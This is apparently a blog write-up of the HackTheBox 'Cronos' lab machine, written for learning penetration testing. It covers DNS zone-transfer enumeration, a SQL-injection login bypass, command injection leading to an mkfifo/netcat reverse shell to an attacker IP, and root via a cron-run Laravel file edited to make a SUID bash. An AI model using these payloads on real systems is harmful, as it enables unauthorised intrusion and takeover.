HackTheBox - Cronos
Description
Hello hackers, I hope you are doing well. We are doing Cronos from HackTheBox. A medium linux box where we bypass a login page using sqli and find a command injection vulnerability that we exploit to get foothold. After that we exploit a cronjob to get root access.
Enumeration
nmap
We start a nmap scan using the following command: sudo nmap -sC -sV -T4 {target_IP}
.
-sC: run all the default scripts.
-sV: Find the version of services running on the target.
-T4: Aggressive scan to provide faster results.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Nmap scan report for 10.10.10.13
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18b973826f26c7788f1b3988d802cee8 (RSA)
| 256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
|_ 256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We found three open ports, 22 running OpenSSH, 53 is DNS and 80 is an Apache http web server, all running on Ubuntu.
Web
Let’s check the web page.
It’s the default page for Apache, and nothing interesting can be found.
DNS
Let’s use nslookup
to extract information from the DNS server and see if we can get a domain name.
1
2
3
4
5
6
7
8
$ nslookup
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 127.0.0.1
1.0.0.127.in-addr.arpa name = localhost.
> 10.10.10.13
13.10.10.10.in-addr.arpa name = ns1.cronos.htb.
We found the domain cronos.htb
, let’s add it to /etc/hosts
and navigate to it.
We got another page this time, but still nothing useful can be found.
ffuf
Let’s fuzz for subdomains
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ ffuf -c -w /usr/share/seclists/Discovery/DNS/namelist.txt -u http://cronos.htb/ -H "Host: FUZZ.cronos.htb/" -fl 380
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.4.1-dev
________________________________________________
:: Method : GET
:: URL : http://cronos.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/namelist.txt
:: Header : Host: FUZZ.cronos.htb/
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response lines: 380
________________________________________________
admin [Status: 200, Size: 1547, Words: 525, Lines: 57, Duration: 482ms]
Not until i finished the scan i realized that i could’ve enumerated the DNS server to get subdomains.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ dig axfr cronos.htb @10.10.10.13
; <<>> DiG 9.16.37-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 586 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Mon May 01 09:45:03 +01 2023
;; XFR size: 7 records (messages 1, bytes 203)
We found the subdomain admin
, we add it to /etc/hosts/
and navigate to it.
It’s a login page, i tried some default credentials and failed but managed to login using sql injection with the famous payload ' or 1=1 -- -
Foothold
After login in successfully i saw that we can run traceroute, so i wasted no time and tested for command injection.
Great! The web site is vulnerable, now it’s time for a reverse shell, and for that i used nc mkfifo
.
1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.17.90 9001 >/tmp/f
Privilege Escalation
Checking the /etc/crontab
we see a cronjob running every minute.
1
2
3
4
5
6
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
After some research i found this documentation about scheduled tasks in Laravel.
The scheduled tasks can be found in app/Console/Kernel.php
file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php
namespace App\Console;
use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;
class Kernel extends ConsoleKernel
{
/**
* The Artisan commands provided by your application.
*
* @var array
*/
protected $commands = [
//
];
/**
* Define the application's command schedule.
*
* @param \Illuminate\Console\Scheduling\Schedule $schedule
* @return void
*/
protected function schedule(Schedule $schedule)
{
// $schedule->command('inspire')
// ->hourly();
}
/**
* Register the Closure based commands for the application.
*
* @return void
*/
protected function commands()
{
require base_path('routes/console.php');
}
}
At the very bottom we see the routes/console.php file being called.
As user www-data
we have control over that file, so we can change it to execute something malicious. In this case, I’ll edit console.php
to run the following code.
1
<?php shell_exec('cp /bin/bash /tmp/bash && chmod +s /tmp/bash'); ?>
This will create a copy on bash in /tmp and give it suid permission so i can run it as root.
And we got root!
Thank you for taking the time to read my write-up, I hope you have learned something from this. If you have any questions or comments, please feel free to reach out to me. See you in the next hack :).